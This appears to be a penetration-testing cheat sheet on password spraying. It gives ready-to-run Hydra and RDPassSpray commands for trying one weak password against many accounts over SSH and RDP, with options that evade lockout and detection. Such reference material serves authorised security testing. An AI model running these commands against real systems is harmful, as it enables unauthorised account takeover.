Skip to main content

Password Spraying

Useful if there is an Account Lockout Policy

Password Spraying is an effective technique used to Identify Valid Credentials. Password Spraying is one of the most Common Password Attacks for discovering Weak Passwords.

This technique can be used against various Online Services and Authentication Systems, such as SSH - SMB - RDP - SMTP - Outlook Web Application, etc. Password Spraying Attack targets many Usernames using one Common Weak Password, which could help avoid an account Lockout Policy.

:: Example of Password Spraying using Hydra
hydra -L <Username List> -p Pa$$w0rd ssh://<IP>

RDP

If we found an exposed RDP Service. We can use a Tool such as RDPassSpray to Password Spray against RDP.

RDPassSpray -U <Username List> -p Pa$$w0rd -t <IP:PORT>

:: [-U] - Users List to use.
:: [-u] - Single Username.
:: [-P] - Password List to use.
:: [-p] - Single Password.
:: [-T] - Targets List to use.
:: [-t] - Target Machine to Authenticate Against.
:: [-d] - Domain Name to Use.
:: [-s] - Throttle the Attempts.
:: [-r] - Randomize the Time between each Authentication Attempt.
:: [-o] - Output to a CSV File.
:: [-V] - Verbose Output.
:: [-n] - Hostnames List to use as the Source Hostnames.